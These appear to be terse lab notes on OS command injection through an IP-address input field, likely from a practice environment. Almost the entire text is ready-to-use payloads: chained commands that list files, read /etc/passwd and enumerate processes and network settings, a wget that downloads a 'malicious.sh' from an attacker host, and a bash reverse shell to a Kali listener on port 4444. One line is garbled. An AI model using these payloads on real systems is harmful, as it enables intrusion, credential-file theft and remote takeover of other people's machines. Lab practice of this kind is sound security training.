click command execution 

1.enter ip address and submit

listing files
2.Input: 192.168.47.92;ls 

view password file
3.Input: 192.168.47.92; ; cat /etc/passwd

Download Malicious Script: If you have a malicious script hosted on a server:
Q qq192.168.47.92; wget http://<attacker-ip>/malicious.sh
192.168.47.92; bash -i >& /dev/tcp/<kali-ip>/4444 0>&1


extra commands
ip address ; ls

 ip address && whoami

 ip address || whoami

 ip address && ls /etc

 ip address && cat /etc/passwd

 ip address && ls -la

 ip address && ps aux

 ip address && ifconfig

 ip address && mkdir dvs
